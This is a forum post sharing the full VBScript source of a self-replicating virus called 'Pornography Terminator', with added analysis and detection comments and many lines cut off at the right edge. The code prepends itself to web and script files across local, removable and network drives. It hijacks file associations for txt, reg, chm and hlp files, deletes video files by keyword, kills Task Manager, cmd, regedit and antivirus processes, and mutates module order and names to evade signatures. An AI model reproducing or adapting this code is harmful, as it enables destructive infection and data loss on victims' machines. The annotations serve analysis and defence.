
[VBS Virus]Pornography Terminator Source code


Started By PanHaiqing, Mar 29 2013 07:00 PM
VBS Virus Pornography Terminator

 Please log in to reply


No replies to this topic

#1

PanHaiqing

Posted 29 March 2013 - 07:00 PM


Pornography Terminator Virus Source code

[-]Visual Basic
1 'Administrator4
'HJLMRRQRWYOZX2_25
2
' Removes the registry key or value named by strkey through WScript.Shell.RegDelete.
' Listing note: the bare numbers between statements are line-number residue from the
' forum's code widget, not script text.
Sub DeleteReg(strkey)
3
Dim tmps
4
Set tmps = CreateObject("WScript.Shell")
5
tmps.RegDelete strkey
6
Set tmps = Nothing
7
End Sub
8
' Returns the data stored at registry path strkey (WScript.Shell.RegRead).
' The function has no error handling of its own; the callers visible in this listing
' run under On Error Resume Next and compare the result against "" or an expected value.
Function ReadReg(strkey)
9
Dim tmps
10
Set tmps = CreateObject("WScript.Shell")
11 ReadReg = tmps.RegRead(strkey)
12
Set tmps = Nothing
13
End Function
14
' Writes Value to registry path strkey. When vtype is non-empty (callers pass "REG_DWORD")
' it is handed to RegWrite as the value type; otherwise RegWrite's default type applies.
' Analysis note: every registry write visible in this listing goes through this wrapper,
' so registry modifications made by a WScript.exe/CScript.exe process are the telemetry
' that covers the persistence and file-association changes made elsewhere in the script.
Sub WriteReg(strkey, Value, vtype)
15
Dim tmps
16
Set tmps = CreateObject("WScript.Shell")
17
If vtype = "" Then
18 tmps.RegWrite strkey, Value
19 Else
20 tmps.RegWrite strkey, Value, vtype
21 End If
22 Set tmps = Nothing
23 End Sub
24 'WQKAULMNKKG2_25
25 'HJLMRRQRWYOZX2_21
' Returns True when the file name fname contains any keyword from a fixed list of
' Chinese-language terms. SearchFile calls this for mpg/rmvb/avi/rm files and deletes
' the file on a match, so the payload is destructive (data loss), not only self-copying.
' Listing note: the continuation lines of the keyword test are cut off at the right
' edge here, so the complete keyword list and the closing "Then" are not visible.
26 Function IsSexFile(fname)
IsSexFile = False
27
28 If InStr(fname, "成人")>0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷拍")>0 Or _
29 InStr(fname, "偷窥")>0 Or InStr(fname, "口交")>0 Or InStr(fname, "强奸")>0
30 InStr(fname, "轮奸")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "自摸")
31 IsSexFile = True
32 End If
33 End Function
' Reports whether a file's text (buffer) already carries this script.
' For hta/htm/html/asp/vbs the test is the presence of the Head_V marker string;
' every other file type is reported as True, which makes callers leave it alone.
' Analysis note: Head_V is a comment line built from "'" plus the value returned by
' GetUserName (see GetHeadTail), so the marker to search for in script and web files
' depends on the host it was generated on.
34 Function Isinfected(buffer, ftype)
35 Isinfected = True
36 Select Case ftype
37 Case "hta", "htm" , "html" , "asp", "vbs"
38 If InStr(buffer, Head_V) = 0 Then
39 Isinfected = False
40 End If
41 Case Else
42 Isinfected = True
43 End Select
44 End Function
45 'WQKAULMNKKG2_21
'HJLMRRQRWYOZX2_22
46
' Returns the path of FileSystemObject special folder p with a trailing backslash.
' The top-level code passes 0 and 1 (Windows folder and System folder in the FSO
' numbering) to build FullPath_V0, FullPath_V1 and FullPath_Config, so those two
' directories are where the dropped .vbs and .ini files should be looked for.
Function GetSFolder(p)
47
Dim objfso
48
Set objfso = CreateObject(GetFSOName())
49 GetSFolder = objfso.GetSpecialFolder(p) & "\"
50
Set objfso = Nothing
51
End Function
52
' Returns a name read from a value under
' HKCU\Software\Microsoft\Active Setup\Installed Components\{...}, or "Administrator"
' when that read yields an empty string.
' Listing note: the registry path is cut off after "{44", so the exact component GUID
' and value name cannot be determined from this page.
' Analysis note: the result is used as the base name of the dropped files
' (Name_V1 = GetUserName() & ".vbs", config = GetUserName() & ".ini") and as the
' head/tail marker text, so file names and markers differ from host to host.
Function GetUserName()
53
On Error Resume Next
54
Dim Value , UserName
55 Value = "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{44
56 UserName = ReadReg(Value)
57 If UserName = "" Then
58 GetUserName = "Administrator"
59 Else
60 GetUserName = UserName
61 End If
62 End Function
63 Function GetFSOName()
64 On Error Resume Next
65 Dim Value , UserName
66 Value = "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID\"
UserName = ReadReg(Value)
67
If UserName = "" Then
68 GetUserName = "Scripting.FileSystemObject"
69 Else
70 GetFSOName = UserName
71 End If
72 End Function
' Builds the marker comment that brackets the script body.
'   l = 0  -> "'" followed by GetUserName()            (head marker, Head_V)
'   else   -> "'" followed by GetUserName() reversed   (tail marker, Tail_V)
' Analysis note: this matches the first and last lines of the sample as posted
' ("'Administrator" followed by the version digit, and "'rotartsinimdA"). A scanner can
' look for a comment line and its character-reversed twin enclosing a script block.
73 Function GetHeadTail(l)
74 Dim Str , buffer
75 If l = 0 Then
76 GetHeadTail = "'" & GetUserName()
77 Else
buffer = GetUserName()
78 Str = ""
79 For i = 1 To Len(buffer)
80 Str = Mid(buffer, i, 1) & Str
81 GetHeadTail = "'" & Str
82 Next
83 End If
84 End Function
85 'WQKAULMNKKG2_22
86 'HJLMRRQRWYOZX1_9
' Re-emits vbsCode with its Num_DNA marker-delimited modules in a random order.
' Steps visible below: draw a random permutation of 1..Num_DNA into DNA(), pull each
' module out with GetModelCode, then concatenate them in permuted order between
' Head_V & Version and Tail_V.
' Analysis note: because module order changes on every call, file hashes and
' byte-offset signatures differ between copies. This routine does not alter the text
' inside a module or the head/tail markers, so content-based matching on module bodies
' is the more durable approach.
87 Function ChangeModelOrder(vbsCode, Num_DNA)
88 On Error Resume Next
89 Dim DNA(), Array_vbsCode()
90 Dim i, Value, flag, j, buffer
91 ReDim DNA(Num_DNA), Array_vbsCode(Num_DNA)
92 buffer = vbsCode
Randomize
93
For i = 1 To Num_DNA
94 Do
95 Value = Int((Num_DNA * Rnd) + 1)
96 flag = 1
97 For j = 1 To Num_DNA
98 If Value = DNA(j) Then
99 flag = 0
100 Exit For
101 End If
102 Next
103 Loop Until flag = 1
DNA(i) = Value
104 Next
105 For i = 1 To Num_DNA
106 Array_vbsCode(i) = GetModelCode(buffer, i)
107 Next
108 buffer = ""
109 For i = 1 To Num_DNA
110 buffer = buffer & VBCRLF & Array_vbsCode(DNA(i)) & VBCRLF
Next
111 ChangeModelOrder = Head_V & Version & VBCRLF & buffer & VBCRLF & Tail_V
112 End Function
113 'WQKAULMNKKG1_9
114 'HJLMRRQRWYOZX2_26
115 Sub Run(ExeFullName)
116 Dim WshShell
117 Set WshShell = WScript.CreateObject("WScript.Shell")
118 WshShell.Run ExeFullName
119 Set WshShell = Nothing
120 End Sub
121 Sub CopyFile(objfso, code, pathf)
122 On Error Resume Next
123 Dim vf
124 Set vf = objfso.OpenTextFile(pathf, 2, true)
125 vf.Write code
126 End Sub
' Returns vbsCode with every occurrence of each string in Names replaced by a fresh
' random string of uppercase letters of the same length.
' Analysis note: ExeVbs_Virus passes the two module-marker prefixes
' ("HJLMRRQRWYOZX", "WQKAULMNKKG") as Names, so those literal strings are specific to
' this posted copy and are not stable indicators across generations.
127 Function ChangeName(vbsCode, Names)
128 Dim Name, j, temp, buffer
129 buffer = vbsCode
130 Randomize
131 For Each Name in Names
temp = ""
132
For j = 1 To Len(Name)
133 temp = temp & Chr((Int(Rnd * 26) + 65))
134 Next
135 buffer = Replace(buffer, Name, temp)
136 Next
ChangeName = buffer
137
138 End Function
'WQKAULMNKKG2_26
139 'HJLMRRQRWYOZX2_16
' Points the open command of the "txtfile" class at WScript.exe running sFilePath,
' so opening a .txt file launches the script first (file-association hijack).
' Listing note: the WriteReg argument list is cut off after "Va"; presumably the
' remaining arguments are Value and a type string -- confirm against the attachment.
' Detection: the default value of HKLM\SOFTWARE\Classes\txtfile\shell\open\command
' containing "WScript.exe" instead of the notepad command that RestoreSystem writes back.
140 Sub SetTxtFileAss(sFilePath)
141 On Error Resume Next
142 Dim Value
143 Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
144
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Va
145
End Sub
146
' Same file-association hijack as SetTxtFileAss, applied to the "hlpfile" class:
' the open command becomes WScript.exe "<sFilePath>" %1 %*.
' Listing note: the WriteReg call is truncated at the right edge.
' Detection: HKLM\SOFTWARE\Classes\hlpfile\shell\open\command referencing WScript.exe.
Sub SethlpFileAss(sFilePath)
147
On Error Resume Next
148
Dim Value
149
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
150
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Va
151
152 End Sub
' Same file-association hijack as SetTxtFileAss, applied to the "regfile" class.
' Analysis note: with this in place, double-clicking a .reg file (a common manual
' repair step) runs the script instead of regedit; ExeVbs_Virus then forwards the
' file to regedit.exe itself.
' Listing note: the WriteReg call is truncated at the right edge.
153 Sub SetRegFileAss(sFilePath)
154 On Error Resume Next
155 Dim Value
156 Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
157 Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Va
158 End Sub
' Same file-association hijack as SetTxtFileAss, applied to the "chm.file" class.
' Listing note: the WriteReg call is truncated at the right edge.
' Detection: HKLM\SOFTWARE\Classes\chm.file\shell\open\command referencing WScript.exe
' rather than hh.exe.
159 Sub SetchmFileAss(sFilePath)
160 On Error Resume Next
161 Dim Value
162 Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
163 Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", V
164 End Sub
165 'WQKAULMNKKG2_16
166 'HJLMRRQRWYOZX2_12
' Processes one candidate file (strPath / fi) of type ftype.
'   T = 0: if the file is smaller than 350000 bytes and does not yet contain Head_V,
'          rewrite it with script code placed in front of the original content
'          (web types get the code wrapped by MakeScript; .vbs files get VbsCode_Victim
'          and lose their first "Option Explicit"). Cnt counts rewritten files.
'   T = 1: for a file that contains Head_V, remove one occurrence of Tail_V and
'          rewrite the file.
' Analysis note for responders: the T = 1 branch is what the script's own "KillVirus"
' order uses, but as shown it only strips the tail marker and writes back strCode
' (never assigned in this branch) plus the remaining buffer. The prepended code is not
' removed, so infected files need to be restored from backup or cleaned by other means
' rather than by relying on the sample's built-in removal order.
' Errors are suppressed throughout, and the original file is overwritten in place
' with no backup copy.
167 Sub InfectHead(strPath, fi, objfso, VbsCode_WebPage, VbsCode_Victim, ftype, T)
168 On Error Resume Next
169 Dim tso, buffer, strCode , Maxsize
170 Maxsize = 350000
171 If fi.Size< Maxsize Then
172 Set tso = objfso.OpenTextFile(strPath, 1, True)
buffer = tso.ReadAll()
173 tso.Close
174 If T = 0 Then
175
Select Case ftype
176
Case "hta", "htm", "html", "asp"
177
If Isinfected(buffer, ftype) = False Then
178
Set tso = objfso.OpenTextFile(strPath, 2, true)
179 strCode = MakeScript(VbsCode_WebPage, 0)
180 tso.Write strCode & VBCRLF & buffer
181 Cnt = Cnt + 1
182 End If
183 Case "vbs"
184 If Isinfected(buffer, ftype) = False Then
185 n = InStr(buffer , "Option Explicit")
186 If n<>0 Then
187 buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
188 Set tso = objfso.OpenTextFile(strPath, 2, true)
tso.Write vbsCode_Victim & VBCRLF & buffer
189 Cnt = Cnt + 1
190 Else
191 Set tso = objfso.OpenTextFile(strPath, 2, true)
192 tso.Write vbsCode_Victim & VBCRLF & buffer
193 Cnt = Cnt + 1
194 End If
195 End If
196 Case Else
197 '
198 '
199 End Select
200 ElseIf T = 1 Then
201 If Isinfected(buffer, ftype) = True Then
n = InStrRev(buffer , Tail_V)
202
If n<>0 Then
203 buffer = Replace(buffer, Tail_V, "", n, 1, 1)
204 Set tso = objfso.OpenTextFile(strPath, 2, True)
205 tso.Write strCode & VBCRLF & buffer
206 End If
207 End If
208 End If
209 End If
210 End Sub
211 'WQKAULMNKKG2_12
212 'HJLMRRQRWYOZX2_17
' Single-instance check: returns True when at least two processes returned by the WMI
' query have a command line containing this script's full path.
' Listing note: the WQL WHERE clause is cut off, so the process-name filter is not
' visible here.
' Detection: a script host querying Win32_Process over root\cimv2 and then inspecting
' CommandLine shows up in WMI activity logging.
213 Function PreInstance()
214 On Error Resume Next
215 Dim num_cnt
216 Dim strComputer, objWMIService, colProcessList, objProcess
217 num_cnt = 0
PreInstance = False
218 strComputer = "."
219 Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
220 Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " &
221
For Each objProcess in colProcessList
222
If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
223 num_cnt = num_cnt + 1
224 End If
225 Next
226 If num_cnt>= 2 Then
227 PreInstance = True
228 End If
229 End Function
230 'WQKAULMNKKG2_17
231 'HJLMRRQRWYOZX1_8
' The sample's own uninstall routine (reached through the "UnLoadMe" and "KillVirus"
' orders in ExeVbs_Virus). It is useful to responders as a checklist of what the
' script changes on a host:
'   - calls SafeSet() to put the Explorer settings back,
'   - deletes the HKCU "...\Windows NT\CurrentVersion\Windows\L..." value when it points
'     at FullPath_V1 (path truncated in this listing; presumably the "Load" value --
'     confirm against the attachment),
'   - rewrites the open commands for txtfile, regfile, chm.file, hlpfile and exefile
'     to the values built below (the comparisons and WriteReg calls are cut off at the
'     right edge),
'   - on every drive that has Name_V1 in its root, deletes that file and AutoRun.inf,
'   - deletes FullPath_V1, FullPath_V0 and FullPath_Config.
' Caveats: errors are suppressed, AutoRun.inf is deleted without checking its content,
' and files already modified by InfectHead are not touched here.
232 Sub RestoreSystem(objfso)
233 On Error Resume Next
234 Dim Value, dc, d, HCULoad
235 Call SafeSet()
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\L
236
237 If ReadReg(HCULoad) = FullPath_V1 Then
238 Call DeleteReg(HCULoad)
239 End If
Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
240
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Valu
241
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\
242
End If
243
244 Value = "regedit.exe " & """%1"""
245 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Valu
246 Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\
247 End If
248 Value = GetSFolder(1) & "hh.exe " & """%1"""
249 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Val
250 Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command
251 End If
252 Value = "%SystemRoot%\system32\winhlp32.exe %1"
253 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Valu
254 Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\
255 End If
256 Value = """%1"" %*"
257 If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\")<>Valu
258 Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\"
259 End If
260 Set dc = objfso.Drives
261 For Each d In dc
262 If objfso.FileExists(d.DriveLetter & ":\" & Name_V1) = True Then
263 objfso.DeleteFile d.DriveLetter & ":\" & Name_V1
264 objfso.DeleteFile d.DriveLetter & ":\" & "AutoRun.inf"
265 End If
Next
266
If objfso.FileExists(FullPath_V1) = True Then
267
268 Set vf = objfso.GetFile(FullPath_V1)
vf.Delete
269
End If
270
If objfso.FileExists(FullPath_V0) = true Then
271
Set vf = objfso.GetFile(FullPath_V0)
272 vf.Delete
273 End If
274 If objfso.FileExists(FullPath_Config) = True Then
275 objfso.DeleteFile FullPath_Config , True
276 End If
277 End Sub
278 'WQKAULMNKKG1_8
279 'HJLMRRQRWYOZX1_5
' Resident loop: every 5000 ms it terminates the processes named in ProcessNames
' (KillProcess) and re-applies the drops and registry changes (InvadeSystem).
' Listing note: the process list is cut off after "re"; the visible entries include
' taskmgr.exe, cmd.exe, regedit.exe and 360tray.exe.
' Response note: because the loop re-writes its files and registry values every few
' seconds, manual cleanup done while the WScript.exe process is still running will be
' undone; the process has to be stopped first.
280 Sub MonitorSystem(objfso, vbsCode)
281 On Error Resume Next
282 Dim ProcessNames
283 ProcessNames =
284 Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "re
Do
285
Call KillProcess(ProcessNames)
286
Call InvadeSystem(objfso, vbsCode)
287 WScript.Sleep 5000
288 Loop
289 End Sub
290 'WQKAULMNKKG1_5
291 'HJLMRRQRWYOZX1_4
292 Function Head()
293 Head = VBCRLF & "'HJLMRRQRWYOZX1_1" & VBCRLF &_
294 "On Error Resume Next" & VBCRLF &_
295 "Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_M
296 "Dim ModelHead, ModelTail" & VBCRLF &_
297 "Cnt = 0" & VBCRLF &_
298 "CntMax = 1000" & VBCRLF &_
299 "Version = ""4""" & VBCRLF &_
300 "Name_V1 = GetUserName() & "".vbs""" & VBCRLF &_
301 "FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_
302
"FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_
303
304 "FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令" & VBCRLF &_
305 "FullPath_Config= GetSFolder(1) & GetUserName() & "".ini""" & VBCRLF &_
306 "Sum_ModelCode = 26" & VBCRLF &_
307 "Head_V= GetHeadTail(0)" & VBCRLF &_
308 "Tail_V= GetHeadTail(1)" & VBCRLF &_
309 "ModelHead=""'HJLMRRQRWYOZX""" & VBCRLF &_
310 "ModelTail=""'WQKAULMNKKG""" & VBCRLF
311 End Function
312 Function VictimHead()
313 VictimHead = Head() & VBCRLF &_
314 "Call VictimMain()" & VBCRLF &_
315 "Sub VictimMain()" & VBCRLF &_
316 " Call ExeVbs_Victim()" & VBCRLF &_
317 "End Sub" & VBCRLF &_
318 "'WQKAULMNKKG1_1" & VBCRLF
319 End Function
320 Function VirusHead()
321 VirusHead = Head() & VBCRLF &_
322 "Call VirusMain()" & VBCRLF &_
323 "Sub VirusMain()" & VBCRLF &_
324 " On Error Resume Next" & VBCRLF &_
325 " Call ExeVbs_Virus()" & VBCRLF &_
326 "End Sub" & VBCRLF & VBCRLF &_
327 "'WQKAULMNKKG1_1" & VBCRLF
328 End Function
329 Function WebHead()
330 WebHead = Head() & VBCRLF &_
331 "Call WebMain()" & VBCRLF &_
332 "Sub WebMain()" & VBCRLF &_
333 " On Error Resume Next" & VBCRLF &_
334 " Call ExeVbs_WebPage()" & VBCRLF &_
335 "End Sub" & VBCRLF &_
336 "'WQKAULMNKKG1_1" & VBCRLF
337 End Function
338 'WQKAULMNKKG1_4
339 'HJLMRRQRWYOZX2_20
340 Function GetModelCode(vbsCode, N_ModelCode)
341 On Error Resume Next
342 Dim n, n1, buffer
343 buffer = vbsCode
344 If N_ModelCode>= 1 And N_ModelCode<= 9 Then
345 n = InStr(buffer, ModelHead & "1_" & N_ModelCode)
346 n1 = InStr(buffer, ModelTail & "1_" & N_ModelCode)
347 GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "1_" & N_ModelCode))
348 ElseIf N_ModelCode>= 10 And N_ModelCode<= 99 Then
349 n = InStr(buffer, ModelHead & "2_" & N_ModelCode)
350 n1 = InStr(buffer, ModelTail & "2_" & N_ModelCode)
351 GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "2_" & N_ModelCode))
352 ElseIf N_ModelCode>= 100 And N_ModelCode<= 999 Then
353 n = InStr(buffer, ModelHead & "3_" & N_ModelCode)
354 n1 = InStr(buffer, ModelTail & "3_" & N_ModelCode)
355 GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "3_" & N_ModelCode))
356 End If
357 End Function
358 'WQKAULMNKKG2_20
359 'HJLMRRQRWYOZX1_2
360 Sub ExeVbs_WebPage()
361 On Error Resume Next
362 Dim objfso, vbsCode, VbsCode_Virus
363 Set objfso = CreateObject(GetFSOName())
364 vbsCode = GetScriptCode("vbscript")
365 VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
366
Call InvadeSystem(objfso, VbsCode_Virus)
367
368 Set objfso = Nothing
369 End Sub
370 Sub ExeVbs_Victim()
371 On Error Resume Next
372 Dim objfso, vbsCode, VbsCode_Virus
373 Set objfso = CreateObject(GetFSOName())
374 vbsCode = GetSelfCode(objfso, WScript.ScriptFullName)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_
375 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
376 Call InvadeSystem(objfso, VbsCode_Virus)
377 Call Run(FullPath_V1)
378 Set objfso = Nothing
379 End Sub
380 'WQKAULMNKKG1_2
381 'HJLMRRQRWYOZX2_11
' Recursively walks strPath. For each file, dispatches on the lower-cased extension:
'   hta/htm/html/asp/vbs -> InfectHead (call is cut off at the right edge in this listing)
'   mpg/rmvb/avi/rm      -> deleted when IsSexFile matches the file name
' The walk stops once the global counter Cnt reaches CntMax (set to 1000 at top level),
' which bounds the number of files rewritten per run.
' Detection: a script host enumerating whole drives and opening many web/script files
' for writing in a short period, or deleting video files, is the observable behaviour.
382 Sub SearchFile(objfso, strPath, VbsCode_WebPage, VbsCode_Victim, T)
383 On Error Resume Next
384 Dim pfo, pf, pfi, ext
385 Dim psfo, ps
386 Set pfo = objfso.GetFolder(strPath)
387 Set pf = pfo.Files
388 For Each pfi In pf
389 If Cnt >= CntMax Then
390 Exit For
391 End If
392 ext = LCase(objfso.GetExtensionName(pfi.Path))
393 Select Case ext
394 Case "hta", "htm", "html", "asp", "vbs"
395 Call InfectHead(pfi.Path, pfi, objfso, VbsCode_WebPage, VbsCode_Victim,
396 Case "mpg", "rmvb", "avi", "rm"
397 If IsSexFile(pfi.Name) = True Then
398 pfi.Delete
399 End If
400 End Select
401 Next
402 Set psfo = pfo.SubFolders
403 For Each ps In psfo
404 If Cnt >= CntMax Then
405 Exit For
406 End If
407 Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T)
408 Next
409 End Sub
'WQKAULMNKKG2_11
410 'HJLMRRQRWYOZX2_10
' Runs SearchFile over the root of every drive whose DriveType is 1, 2 or 3
' (removable, fixed and network in the FileSystemObject numbering), stopping when the
' global counter Cnt reaches CntMax.
' Analysis note: network drives (type 3) are included, so mapped shares are within
' reach of the file rewriting and deletion done by SearchFile.
411 Sub SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, T)
412 On Error Resume Next
413
Dim d , dc
414
Set dc = objfso.Drives
415
For Each d In dc
416
If Cnt >= CntMax Then '
417
Exit For
418
End If
419
420 If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
'If d.DriveType = 1 Then
421
Call SearchFile(objfso, d.Path & "\", VbsCode_WebPage, VbsCode_Victim, T)
422 'End If
423 End If
424 Next
425 End Sub
426 'WQKAULMNKKG2_10
427 'HJLMRRQRWYOZX1_3
428 Sub ExeVbs_Virus()
429 On Error Resume Next
430 Dim objfso, objshell, FullPath_Self, Name_Self, Names
431 Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath
432 Dim Order, Order_Order, Order_Para
433 Dim vbsCode , VbsCode_Virus, VbsCode_WebPage, VbsCode_Victim , MainBody
434 Set objfso = CreateObject(GetFSOName())
435 Set objshell = CreateObject("WScript.Shell")
436 FullPath_Self = WScript.ScriptFullName
437 Name_Self = WScript.ScriptName
438 Names = Array("HJLMRRQRWYOZX", "WQKAULMNKKG")
439 Set oArgs = WScript.Arguments
ArgNum = 0
440
Do While ArgNum < oArgs.Count
441
Para_V = Para_V & " " & oArgs(ArgNum)
442 ArgNum = ArgNum + 1
443 Loop
444 SubPara_V = LCase(Right(Para_V, 3))
445 Select Case SubPara_V
446 Case "run"
447 RunPath = Left(FullPath_Self, 2)
448 Call Run(RunPath)
449 vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCo
450 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
451 VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
452 Call InvadeSystem(objfso, VbsCode_Virus)
453 Call Run(FullPath_V1)
454 Case "txt", "log"
455 RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V
456 Call Run(RunPath)
457 vbsCode = GetSelfCode(objfso, FullPath_Self)
458 VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCo
459 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
460 VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
461 Call InvadeSystem(objfso, VbsCode_Virus)
462 Call Run(FullPath_V1)
463 Case "reg"
464 Para_V = "regedit.exe " & """" & Trim(Para_V) & """"
465 Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
466
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCo
467 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
468 VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
469 Call InvadeSystem(objfso, VbsCode_Virus)
470 Call Run(FullPath_V1)
471 Case "chm"
472 Para_V = "hh.exe " & """" & Trim(Para_V) & """"
473 Call Run(Para_V)
474 vbsCode = GetSelfCode(objfso, FullPath_Self)
475 VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCo
476 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
477
Call InvadeSystem(objfso, VbsCode_Virus)
478
Call Run(FullPath_V1)
479
Case "hlp"
480
Para_V = "winhlp32.exe " & """" & Trim(Para_V) & """"
481
482 Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
483 VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCo
484 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
485
Call InvadeSystem(objfso, VbsCode_Virus)
486
Call Run(FullPath_V1)
487
Case Else
488
If PreInstance = True Then
489 WScript.Quit
490 End If
491
If IsOK(objfso, Date(), FullPath_Config) = False Then
492
If objfso.FileExists(FullPath_Config) = True Then
493 Order = Trim(ReadOK(objfso, FullPath_Config))
494 Order_Order = Trim(Mid(Order, 1, InStr(1, Order, "@") -1))
495 Order_Para = Trim(Mid(Order, InStr(1, Order, "@") + 1, Len(Order) -
496 End If
497 Select Case Order_Order
498 Case "InfectFiles"
499 vbsCode = GetSelfCode(objfso, FullPath_Self)
500 MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody
501 VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
502 VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
503 VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBod
504 VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
505
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody
506 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
507 VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
508 Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
509 Order_Para = Order_Para + Cnt
510 If Order_Para>2000 Then
511 VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody
512 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
513 VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
514 Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
515 Order_Para = Order_Para + Cnt
516 If Order_Para>2000 Then
517 Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件
518 src='http://www.rohitab.com/discuss/public/style_emoticons/<#EMO_DIR#>/sleep.png' class
519 Else
520 Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para
521 End If
522 Call InvadeSystem(objfso, VbsCode_Virus)
523 Call MonitorSystem(objfso, VbsCode_Virus)
524 Case "Msg"
525 MsgBox Order_Para
526 Call WriteOK(objfso, FullPath_Config, "", "")
527 vbsCode = GetSelfCode(objfso, FullPath_Self)
528 MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody
529 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
530 VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
531 Call InvadeSystem(objfso, VbsCode_Virus)
532 Call MonitorSystem(objfso, VbsCode_Virus)
533 Case "UnLoadMe"
534 Call RestoreSystem(objfso)
Wscript.Quit
535
Case "KillVirus"
536
537 Call RestoreSystem(objfso)
